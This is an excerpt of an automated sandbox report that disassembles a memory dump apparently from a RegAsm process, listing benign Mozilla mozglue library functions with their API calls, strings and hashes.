API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: e0581b34d182ef1128fc09f72ba513a4307ec658c4948ee139463fe6f4915083
Instruction ID: f93996f447a3559c650905c0f9ac60ded33f209f2a216b365da98a4d6df6f003
Opcode Fuzzy Hash: e0581b34d182ef1128fc09f72ba513a4307ec658c4948ee139463fe6f4915083
Instruction Fuzzy Hash: 6A21F779600108AFDB009F76D808BBA7779EF4636DF104210FC2897B41DB399956DBE1

Function 6C0F3A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6C0F3BB4
ReleaseSRWLockShared.KERNEL32 ref: 6C0F3BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6C0F3BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6C0F3C91
ReleaseSRWLockShared.KERNEL32 ref: 6C0F3CBD
moz_xmalloc.MOZGLUE ref: 6C0F3CF1

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 81870880037f8ed2e11d5c17db33bdffcc98b8e4c356011505f117bce89f8665
Instruction ID: b099c1bb47447ca7cdbecbfb2557575dbe6fbff02cd3328ffa91e2ef991337a4
Opcode Fuzzy Hash: 81870880037f8ed2e11d5c17db33bdffcc98b8e4c356011505f117bce89f8665
Instruction Fuzzy Hash: E4C16DB1A09701CFC714DF29C09475ABBF5BF89314F15865ED9A98BB11D730E886CB82

Function 6C128ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C0EEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C12B392,?,?,00000001), ref: 6C1291F4

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

Strings

timeline-ipc, xrefs: 6C129096
marker-table, xrefs: 6C12906C
marker-chart, xrefs: 6C12905E
timeline-memory, xrefs: 6C129088
timeline-fileio, xrefs: 6C1290A4
data, xrefs: 6C1290E8
stack-chart, xrefs: 6C1290B2
timeline-overview, xrefs: 6C12907A
name, xrefs: 6C128F16

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: de3747b51e4fc3170606b3d87bc16f343b7c3f463b8e59899c6942e85eb3caa8
Instruction ID: 573a827d99e9b586d6bcec030ce743219701650617981906f3fc55afcc60be20
Opcode Fuzzy Hash: de3747b51e4fc3170606b3d87bc16f343b7c3f463b8e59899c6942e85eb3caa8
Instruction Fuzzy Hash: F5B125B5A002099FDB14DF99C461BEEBBB5BF84308F504029D421ABF80D735E995CBD0

Function 6C10C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C10C5A3
WideCharToMultiByte.KERNEL32 ref: 6C10C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C10C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C10CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C10CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10CAA5

Strings

0, xrefs: 6C10D30A
(null), xrefs: 6C10C596

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 9258343d27097fcdac5373cf043f01de78f8741a616489405369babea3de3866
Instruction ID: 7cefac2a1079f76989c1d97564c089004b2b9891a36d720b4bfd21bf798f9971
Opcode Fuzzy Hash: 9258343d27097fcdac5373cf043f01de78f8741a616489405369babea3de3866
Instruction Fuzzy Hash: 1CA18B707083419FDB11EF28C56875ABBE1AF8A758F04892DE88997742DB35D805CFA2

Function 6C10C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C10C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C10C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C10C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C10C891

Strings

nan, xrefs: 6C10C7A8
inf, xrefs: 6C10C78F
NAN, xrefs: 6C10C7AD
INF, xrefs: 6C10C794

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: d5cc4f2db930b5fc937760e07a473dd19f54f0b9040435a3a5ceb800434c24c3
Instruction ID: 2c2cfe66b3038a86290d40116ef612475c4aa026f2f0d3c8031098eeec30bc90
Opcode Fuzzy Hash: d5cc4f2db930b5fc937760e07a473dd19f54f0b9040435a3a5ceb800434c24c3
Instruction Fuzzy Hash: BC51B3706087448BDB00EF2CC59129AFBF1BF9A304F008A2DE9D5A7651EB74D9858B53

Function 6C0E3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C0E350E
__Init_thread_footer.LIBCMT ref: 6C0E3522
__aulldiv.LIBCMT ref: 6C0E3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C0E3592

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C0E3508
kernel32.dll, xrefs: 6C0E34EA

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 3f60383610838d9aa3f623c8c734a9546132f0aeb8daf4928e7ce4ae7c4c8f8d
Instruction ID: 9c64f78bd49410ccdde084e5d9f2c53a3a2ff82a688eb4941f79a5217abcc9dc
Opcode Fuzzy Hash: 3f60383610838d9aa3f623c8c734a9546132f0aeb8daf4928e7ce4ae7c4c8f8d
Instruction Fuzzy Hash: 4D316D71F012059BDF04DBBAC848BBA7BB5FB4A304F10452AE552A3B60EA74A905DB60

Function 6C12EB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
CloseHandle.KERNEL32(?), ref: 6C12EC55
free.MOZGLUE(00000000), ref: 6C12EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C12EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: d1db396128d11147581a0f51af890d1d36e664399cca8f0f5da802e61f984f3e
Instruction ID: f4361d1b1aa0849c1ff89dfa296c5a596da833d6b6e4af2a2446265e594436b3
Opcode Fuzzy Hash: d1db396128d11147581a0f51af890d1d36e664399cca8f0f5da802e61f984f3e
Instruction Fuzzy Hash: D211297AA001149FCF009F76D808BAA7B78EF4532DF104220FD2997B80D7389995DBE1

Function 6C0E4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C124843,?), ref: 6C0E45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E468A
free.MOZGLUE(?,?,?,?,?,?,6C124843,?), ref: 6C0E46C9
free.MOZGLUE(?), ref: 6C0E46EF
free.MOZGLUE(?), ref: 6C0E4712
free.MOZGLUE(?), ref: 6C0E4735
free.MOZGLUE(?), ref: 6C0E4758
free.MOZGLUE(?), ref: 6C0E477B
free.MOZGLUE(?), ref: 6C0E479E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 4d048978869ef6796fce641b0c6eb67a5f97e76efbc7f4c763dc41075ef18f04
Instruction ID: f1dcbcbbcc1a2d092a9d4494ac45234b668de842e73501051fabb1bd7fea58fc
Opcode Fuzzy Hash: 4d048978869ef6796fce641b0c6eb67a5f97e76efbc7f4c763dc41075ef18f04
Instruction Fuzzy Hash: 59B1F472A801109FDB188FFCC99476D77F6AF4A328F580669E456DBBD2D73099408B82

Function 6C14AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C14AC52
CreateFileMappingW.KERNEL32 ref: 6C14AC7D
GetSystemInfo.KERNEL32 ref: 6C14AC98
MapViewOfFile.KERNEL32 ref: 6C14ACB0
GetSystemInfo.KERNEL32 ref: 6C14ACCD
MapViewOfFile.KERNEL32 ref: 6C14AD05
UnmapViewOfFile.KERNEL32 ref: 6C14AD1C
CloseHandle.KERNEL32 ref: 6C14AD28
UnmapViewOfFile.KERNEL32 ref: 6C14AD37
CloseHandle.KERNEL32 ref: 6C14AD43
CloseHandle.KERNEL32 ref: 6C14AD67

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 6df5a20c75592f41205760eb2cd30ceeaf84b23404bc1a572f0aec31b412d6a7
Instruction ID: 4f16bab56541f8110c1715946f0b554faed66c7836b768501accd05647dfce83
Opcode Fuzzy Hash: 6df5a20c75592f41205760eb2cd30ceeaf84b23404bc1a572f0aec31b412d6a7
Instruction Fuzzy Hash: BB3152B1A047048FDB00AF7DD64826EBBF0FF85305F028A3DE99997211EB749558DB82

Function 6C11F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C11D9DB), ref: 6C11F2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C11F2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C11F386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C11F347

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C11F3C8
free.MOZGLUE(00000000,00000000), ref: 6C11F3F3
free.MOZGLUE(00000000,00000000), ref: 6C11F3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6C11F413

Strings

ntdll.dll, xrefs: 6C11F2F0

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: bd408a49528d308552d68e237f4ce35328aa597b68a7ace606a0cde3249cda06
Instruction ID: f69782037b2fa2d89919a8ab2e852d7179646f26877b0809d03d712ba4ee2649
Opcode Fuzzy Hash: bd408a49528d308552d68e237f4ce35328aa597b68a7ace606a0cde3249cda06
Instruction Fuzzy Hash: 774126B1F082158BDB048F2AD8457AEB7B5EF55358F24803DD87AA7F80EB38A455C781

Function 6C146A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146A68
GetCurrentProcess.KERNEL32 ref: 6C146A7D
GetCurrentProcess.KERNEL32 ref: 6C146AA1
EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C146B65
LeaveCriticalSection.KERNEL32(6C16F618,?,?), ref: 6C146B83

Strings

SymInitialize, xrefs: 6C146BA3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: e43bb1bd915044de1a03358bec74d682a7dc0030fca893e5ba6d4b02aff2129f
Instruction ID: 145041c0f0aa94f4fd2bac071c6ca365c9257b51978119f167ab0f221ae5bc47
Opcode Fuzzy Hash: e43bb1bd915044de1a03358bec74d682a7dc0030fca893e5ba6d4b02aff2129f
Instruction Fuzzy Hash: A9418E716053449FDF00CF65C888BAA3BB8EB56308F048579E998CB682DB719518DBA1

Function 6C0F9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0F9675
__Init_thread_footer.LIBCMT ref: 6C0F9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0F96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0F9707
__Init_thread_footer.LIBCMT ref: 6C0F971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9773

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0F97B7
FreeLibrary.KERNEL32 ref: 6C0F97D0
FreeLibrary.KERNEL32 ref: 6C0F97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9824

Strings

NtMapViewOfSection, xrefs: 6C0F9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C0F9670
MapViewOfFileNuma2, xrefs: 6C0F97B1
ntdll.dll, xrefs: 6C0F96E3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: f4f36069461892a2abb41d49b76755a95646d37b4320ff29f306e52b828c172c
Instruction ID: 05de67c5d7e58c3b22394e7e42d3dd9e5b423fc590419bf02b98ed7b0a7c8305
Opcode Fuzzy Hash: f4f36069461892a2abb41d49b76755a95646d37b4320ff29f306e52b828c172c
Instruction Fuzzy Hash: 4541A2B47003059BDF00CFA6D884BA6BBF5FB4931AF044129ED2587B40D730E959DBA1

Function 6C0E1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E1EC1
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1EE1
EnterCriticalSection.KERNEL32(6C16E744), ref: 6C0E1F38
LeaveCriticalSection.KERNEL32(6C16E744), ref: 6C0E1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0E1F83
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FC0
EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FE2
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0E2019

Strings

MOZ_CRASH(), xrefs: 6C0E2000

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 356e3e0931bdbbb03eacc39ee1c9949d528fd0437064c68dfa3f27ff7ea65555
Instruction ID: 70bf3525953dc6474f4d242c3a04059e302cdb400c7e8cd7926ef526e09fa922
Opcode Fuzzy Hash: 356e3e0931bdbbb03eacc39ee1c9949d528fd0437064c68dfa3f27ff7ea65555
Instruction Fuzzy Hash: C641CF71B052258FDB008F6ACC88B6ABBF5EF4D348F010135F9049BB41DB719905ABD1

Function 6C145FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C146009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C146024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C0EEE51,?), ref: 6C146046
OutputDebugStringA.KERNEL32(?,6C0EEE51,?), ref: 6C146061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C146069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C146073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C146082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C16148E), ref: 6C146091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C0EEE51,00000000,?), ref: 6C1460BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C1460C4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: 42aedae052111a87be2786cb9b86717a33bb39778a813a040f38e6422921fbeb
Instruction ID: 7058454179e345cd90cc882e12ee0dd3f995151e1f57c762b5cd26f542ef2ceb
Opcode Fuzzy Hash: 42aedae052111a87be2786cb9b86717a33bb39778a813a040f38e6422921fbeb
Instruction Fuzzy Hash: ED21A1B1A002089FDB105F25DC49BAA7BB8FF45218F0084A9F85A97640CB74E959DFE1

Function 6C130000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

